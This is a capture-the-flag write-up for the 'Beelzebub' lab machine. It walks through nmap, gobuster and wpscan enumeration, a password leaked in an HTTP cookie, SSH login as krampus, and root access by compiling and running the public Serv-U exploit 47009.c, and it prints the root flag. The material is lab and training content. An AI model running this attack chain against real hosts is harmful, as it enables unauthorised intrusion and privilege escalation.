CTF : Beelzebub
Informations
- IP: 192.168.0.173
- MYIP: 192.168.0.36
First enumeration
Basics
- NMAP
console$ sudo nmap -p- -A 192.168.0.173 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-03 00:12 CET Nmap scan report for 192.168.0.173 Host is up (0.00017s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA) | 256 78:89:b3:a2:75:12:76:92:2a:f9:8d:27:c1:08:a7:b9 (ECDSA) |_ 256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-title: Apache2 Ubuntu Default Page: It works |_http-server-header: Apache/2.4.29 (Ubuntu) MAC Address: 08:00:27:EB:0C:6A (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.6 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.17 ms 192.168.0.173 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.28 seconds
console$ gobuster dir -r -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt -u http://192.168.0.173 -x cgi,html,txt,js,php,php.bak,bak,zip,sql,sql.bak,tgz,tar.gz,bkp,tar,rar,id_rsa,log,xml,json,sh,py,pl,rb,csv,pub 2>/dev/null =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.0.173 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: sh,pl,pub,cgi,js,php,tgz,bkp,tar,rb,html,php.bak,sql.bak,tar.gz,id_rsa,log,json,py,txt,bak,zip,csv,sql,rar,xml [+] Add Slash: true [+] Follow Redirect: true [+] Timeout: 10s =============================================================== 2022/03/03 00:13:37 Starting gobuster in directory enumeration mode =============================================================== /index.php (Status: 200) [Size: 271] /index.html (Status: 200) [Size: 10918] /icons/ (Status: 403) [Size: 278] /javascript/ (Status: 403) [Size: 278] /phpmyadmin/ (Status: 200) [Size: 10639] /phpinfo.php (Status: 200) [Size: 95423] /server-status/ (Status: 403) [Size: 278]
view-source:http://192.168.0.173/index.php
html[...] <!--My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5--> [...]
Okayyy... So, I can do the md5sum of beelzebub :
console$ echo -ne 'beelzebub' | md5sum - d18e1e22becbd915b45e0e655429d487 -
I tried to use it with beelzebub as ssh user but nop... After a loooong search I tried this in curl :
console$ curl http://192.168.0.173/d18e1e22becbd915b45e0e655429d487 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/">here</a>.</p> <hr> <address>Apache/2.4.29 (Ubuntu) Server at 192.168.0.173 Port 80</address>
Well I got a 301 and not a 404 so this means there something there. Let's try with gobuster.
I first try with -r to follow redirect but it's redirect to 192.168.1.6. So I tried without the -r param :
consolegobuster dir -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt -u http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/ -x cgi,html,txt,js,php,php.bak,bak,zip,sql,sql.bak,tgz,tar.gz,bkp,tar,rar,id_rsa,log,xml,json,sh,py,pl,rb,csv,pub 2>/dev/null =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: php.bak,pl,php,sql,tgz,sh,cgi,js,zip,bkp,log,py,pub,html,txt,tar.gz,tar,rar,id_rsa,xml,json,bak,sql.bak,rb,csv [+] Add Slash: true [+] Timeout: 10s =============================================================== 2022/03/03 01:33:20 Starting gobuster in directory enumeration mode =============================================================== /wp-content/ (Status: 200) [Size: 0] /index.php (Status: 200) [Size: 57718] /wp-login.php (Status: 200) [Size: 5694] /license.txt (Status: 200) [Size: 19935] /wp-includes/ (Status: 200) [Size: 45807] /readme.html (Status: 200) [Size: 7368] /wp-admin/ (Status: 302) [Size: 0] [--> http://192.168.1.6/d18e1e22becbd915b45e0e655429d487/wp-login.php?redirect_to=http%3A%2F%2F192.168.0.173%2Fd18e1e22becbd915b45e0e655429d487%2Fwp-admin%2F&reauth=1] /xmlrpc.php (Status: 405) [Size: 42] /wp-signup.php (Status: 302) [Size: 0] [--> http://192.168.1.6/d18e1e22becbd915b45e0e655429d487/wp-login.php?action=register]
As we can see this a wordpress website. So I decided to use wpscan. And I had to add --ignore-main-redirect to do so.
consolewpscan --api-token xxxxx --force --url http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/ -e u --ignore-main-redirect _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.20 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/ [192.168.0.173] [+] Started: Thu Mar 3 01:36:43 2022 Interesting Finding(s): [+] Headers | Interesting Entries: | - Server: Apache/2.4.29 (Ubuntu) | - X-Redirect-By: WordPress | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.3.6 identified (Insecure, released on 2020-10-30). | Found By: Atom Generator (Aggressive Detection) | - http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/index.php/feed/atom/, <generator uri="https://wordpress.org/" version="5.3.6">WordPress</generator> | Confirmed By: Style Etag (Aggressive Detection) | - http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/wp-admin/load-styles.php, Match: '5.3.6' | | [!] 8 vulnerabilities identified: | | [!] Title: WordPress 4.7-5.7 - Authenticated Password Protected Pages Exposure | Fixed in: 5.3.7 | References: | - https://wpscan.com/vulnerability/6a3ec618-c79e-4b9c-9020-86b157458ac5 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29450 | - https://wordpress.org/news/2021/04/wordpress-5-7-1-security-and-maintenance-release/ | - https://blog.wpscan.com/2021/04/15/wordpress-571-security-vulnerability-release.html | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pmmh-2f36-wvhq | - https://core.trac.wordpress.org/changeset/50717/ | - https://www.youtube.com/watch?v=J2GXmxAdNWs | | [!] Title: WordPress 3.7 to 5.7.1 - Object Injection in PHPMailer | Fixed in: 5.3.8 | References: | - https://wpscan.com/vulnerability/4cd46653-4470-40ff-8aac-318bee2f998d | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36326 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19296 | - https://github.com/WordPress/WordPress/commit/267061c9595fedd321582d14c21ec9e7da2dcf62 | - https://wordpress.org/news/2021/05/wordpress-5-7-2-security-release/ | - https://github.com/PHPMailer/PHPMailer/commit/e2e07a355ee8ff36aba21d0242c5950c56e4c6f9 | - https://www.wordfence.com/blog/2021/05/wordpress-5-7-2-security-release-what-you-need-to-know/ | - https://www.youtube.com/watch?v=HaW15aMzBUM | | [!] Title: WordPress < 5.8.2 - Expired DST Root CA X3 Certificate | Fixed in: 5.3.10 | References: | - https://wpscan.com/vulnerability/cc23344a-5c91-414a-91e3-c46db614da8d | - https://wordpress.org/news/2021/11/wordpress-5-8-2-security-and-maintenance-release/ | - https://core.trac.wordpress.org/ticket/54207 | | [!] Title: WordPress < 5.8 - Plugin Confusion | Fixed in: 5.8 | References: | - https://wpscan.com/vulnerability/95e01006-84e4-4e95-b5d7-68ea7b5aa1a8 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44223 | - https://vavkamil.cz/2021/11/25/wordpress-plugin-confusion-update-can-get-you-pwned/ | | [!] Title: WordPress < 5.8.3 - SQL Injection via WP_Query | Fixed in: 5.3.11 | References: | - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21661 | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84 | - https://hackerone.com/reports/1378209 | | [!] Title: WordPress < 5.8.3 - Author+ Stored XSS via Post Slugs | Fixed in: 5.3.11 | References: | - https://wpscan.com/vulnerability/dc6f04c2-7bf2-4a07-92b5-dd197e4d94c8 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21662 | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-699q-3hj9-889w | - https://hackerone.com/reports/425342 | - https://blog.sonarsource.com/wordpress-stored-xss-vulnerability | | [!] Title: WordPress 4.1-5.8.2 - SQL Injection via WP_Meta_Query | Fixed in: 5.3.11 | References: | - https://wpscan.com/vulnerability/24462ac4-7959-4575-97aa-a6dcceeae722 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21664 | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-jp3p-gw8h-6x86 | | [!] Title: WordPress < 5.8.3 - Super Admin Object Injection in Multisites | Fixed in: 5.3.11 | References: | - https://wpscan.com/vulnerability/008c21ab-3d7e-4d97-b6c3-db9d83f390a7 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21663 | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-jmmq-m8p8-332h | - https://hackerone.com/reports/541469 [i] The main theme could not be detected. [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:09 <=========================================> (10 / 10) 100.00% Time: 00:00:09 [i] User(s) Identified: [+] valak | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] krampus | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] WPScan DB API OK | Plan: free | Requests Done (during the scan): 1 | Requests Remaining: 24 [+] Finished: Thu Mar 3 01:37:04 2022 [+] Requests Done: 55 [+] Cached Requests: 11 [+] Data Sent: 17.365 KB [+] Data Received: 165.273 KB [+] Memory used: 112.207 MB [+] Elapsed time: 00:00:20
So we have two users : valak and krampus
In the mean time I checked directories found by gobuster and I found something interesting : http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/wp-content/uploads/Talk%20To%20VALAK/
Vulnerabilities search
It seems to be form to contact valak. So I try to use it through burp : In the response we got two cookie :
htmlHTTP/1.1 200 OK Date: Thu, 03 Mar 2022 00:52:15 GMT Server: Apache/2.4.29 (Ubuntu) Set-Cookie: Cookie=b7d0eff31b9cde9a862dc157bb33ec2a Set-Cookie: Password=M4k3Ad3a1 Vary: Accept-Encoding Content-Length: 1964 Connection: close Content-Type: text/html; charset=UTF-8
Exploit
Here we go ! Let's try to use this password. It works for krampus !
We got a shell :)
Privilege escalation
Enumeration for privesc
Alright, by checking .bash_history it seems that we have to privesc via Serv-U FTP server
consolesearchsploit 47009 ------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------- --------------------------------- Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1) | linux/local/47009.c ------------------------------------------------------------------------------------- ---------------------------------
Exploit
On kali :
console$ searchsploit -m linux/local/47009.c $ scp 47009.c krampus@192.168.0.173:/home/krampus/
Then on target :
console$ gcc 47009.c -o pe $ ./pe uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(krampus) opening root shell # cd /root/ # ls root.txt # cat root.txt 8955qpasq8qq807879p75e1rr24cr1a5
\o/